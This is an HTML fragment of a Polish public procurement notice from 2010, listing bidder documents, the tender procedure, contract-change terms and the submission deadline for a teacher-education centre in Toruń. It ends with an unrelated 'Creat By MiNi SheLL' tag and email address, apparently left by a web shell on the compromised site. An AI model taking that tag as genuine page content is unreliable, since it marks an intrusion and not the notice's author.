<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Postnowienia umowy Zamawiający zawarł we wzorze stanowiącym załącznik nr 5 do SIWZ. Poza przypadkami określonymi w umowie zmiany umowy będą mogły nastąpić w wymienionych niżej okolicznościach.
Przewiduje się możliwość dokonania zmiany umowy w następujących wypadkach:
1.zmiana terminu wykonania zamówienia może ulec przedłużeniu za zgodą obu stron, jeżeli wystąpią obiektywne okoliczności uzasadniające zwłokę w wykonaniu przedmiotu zamówienia.
2.zmiana zakresu przedmiotowego umowy - gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za która żadna ze Stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kpcen-torun.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kujawsko - Pomorskie Centrum Edukacji Nauczycieli, Aleja Solidarności 3, 87-100 Toruń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2010 godzina 09:00, miejsce: Kujawsko - Pomorskie Centrum Edukacji Nauczycieli, Aleja Solidarności 3, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com